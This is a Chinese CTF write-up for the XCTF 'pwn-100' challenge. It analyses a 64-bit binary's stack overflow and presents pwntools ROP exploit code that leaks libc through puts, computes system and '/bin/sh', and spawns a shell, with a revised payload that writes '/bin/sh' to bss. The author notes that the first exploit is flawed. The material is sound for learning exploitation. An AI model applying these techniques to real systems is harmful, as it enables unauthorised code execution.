『攻防世界』：进阶区 | pwn-100

防护查看：

    Arch:     amd64-64-little
    RELRO:    Partial RELRO　//RELRO会有Partial RELRO和FULL RELRO，如果开启FULL RELRO，意味着我们无法修改got表
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

程序为６４位程序，我们知道x86都是靠栈来传递参数的而x64换了它顺序是rdi, rsi, rdx, rcx, r8, r9,如果多于6个参数才会用栈我们要先知道这个特性；程序还开启了ＮＸ保护。NX位（No execute bit）是一种在CPU上实现的安全技术，这个位将内存页以数据和指令两种方式进行了分类。被标记为数据页的内存页（如栈和堆）上的数据无法被当成指令执行。由于该保护方式的使用，直接向内存中写入shellcode执行的方式显然失去了作用。因此，我们就需要学习一种著名的绕过技术——ROP（Return-Oriented Programming, 返回导向编程）

×ＲＯＰ相关学习资料１２３

将程序放入ＩＤＡ中静态分析：

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  FILE *v3; // rdi

  setbuf(stdin, 0LL);
  v3 = stdout;
  setbuf(stdout, 0LL);
  sub_40068E(v3, 0LL);
  return 0LL;
}

int sub_40068E()
{
  char v1; // [rsp+0h] [rbp-40h]

  sub_40063D((__int64)&v1, 200);
  return puts("bye~");
}

__int64 __fastcall sub_40063D(__int64 a1, signed int a2)
{
  __int64 result; // rax
  unsigned int i; // [rsp+1Ch] [rbp-4h]

  for ( i = 0; ; ++i )
  {
    result = i;
    if ( (signed int)i >= a2 )
      break;
    read(0, (void *)((signed int)i + a1), 1uLL);
  }
  return result;
}

这个程序的漏洞就在于sub_40068E()函数中给ｖ１开辟的空间0x40字节小于后面sub_40063D()函数对v1变量的写入大小200字节。这里可以利用达到栈溢出的目的。但是这题并没有这么简单，查便上下并没有发现可用的system函数和可用的参数：'/bin/sh'或是'$0'。能够利用的函数有puts和read.

那么可以通过puts泄露出read的真实地址，再使用ＬｉｂｃＳｅａｒｃｈｅｒ获取到ｌｉｂｃ，进而再利用ｌｉｂｃ和ｒｅａｄ的ｐｌｔ地址和暴露出的真实地址得到的ｏｆｆｓｅｔ即可以得到ｓｙｓｔｅｍ函数地址和/bin/sh地址。关于ｌｉｂｃｓｅａｒｃｈｅｒ的使用可以看我之前发的ｂｕｕ入群题。

exp思路：

#coding:utf-8
from pwn import *
from LibcSearcher import *

io = process("./pwn-100")
elf = ELF("./pwn-100")

read_got = elf.got['read'] 
put_plt = elf.sym['puts']
main_addr = 0x4006B8
#ROPgadget --binary pwn-100 --only 'pop|ret'
pop_rdi_ret = 0x0400763

payload = b'a'*0x48 
payload += p64(pop_rdi_ret)
payload += p64(read_got)
payload += p64(put_plt)
payload += p64(main_addr)
payload += 'a'*(0xC8-0x48-32)

io.send(payload)
io.recvuntil('bye~
')
#read_addr = u64(a.recv(4)),这个程序为６４位，接受地址可能会被/x00截断，所以引用老湿傅的接收方法。
#注意，这步重要,必须要去掉末尾的
符号27.
s = io.recv().split('
')[0]
#凑足长度8
for i in range(len(s),8):
    s=s+'x00'
read_addr = u64(s)
#入群题有ＬｉｂｃＳｅａｒｃｈｅｒ函数的使用资料链接
libc = LibcSearcher("read",read_addr)
offset = read_addr - libc.dump('read')
#获取两个至关重要的地址
system_addr=libc.dump("system")+offset
binsh_addr=libc.dump("str_bin_sh")+offset

payload='a'*0x48+p64(pop_rdi)+p64(binsh_addr)+p64(system_addr)+'a'*(0xC8-0x48-24)
io.send(payload)
io.interactive()

 改：这个exp好像还是有问题，会出现多个匹配的libc，而且不能够很好的使用libc中的system地址和str_bin_sh。这里的bin/sh就由我们写入到一个可读可写的内存块上（使用vmmap可以查看）

def stageone():
    payload = 'A'*length+"AAAAAAAA"+p64(pop_rdi)+p64(read_got)     #pop_rdi后紧接read_got，就把read_got传入了rdi，作为参数
    +p64(put_plt)+p64(pop_rdi)+p64(bss)     #上一行执行ret的时候就跳转到puts_plt，执行到现在就类似于执行了一个puts(read_got)
    +p64(pop_rsi_r15)+p64(7)+p64(0)+p64(readn)+p64(start)    #这一行也类似，上一行把bss的地址pop入rdi，然后把7pop入rsi，然后执行readn，就类似于执行了readn(bss，7)
    payload += "A"*(max_length-len(payload))    #这里就是填充
    io.send(payload)
    sleep(1)
    io.send("/bin/sh")        #payload送出去以后，会先puts，然后执行readn(bss,7)，所以就要再送入/bin/sh字符串
    print io.recvuntil("bye~")
    return u64(io.recv()[1:-1].ljust(8,''))

https://blog.csdn.net/weixin_42151611/article/details/91474574，这里有一个老湿傅的wp可以借鉴一下，但是还有一些堆栈平衡的问题需要自己去考虑一下。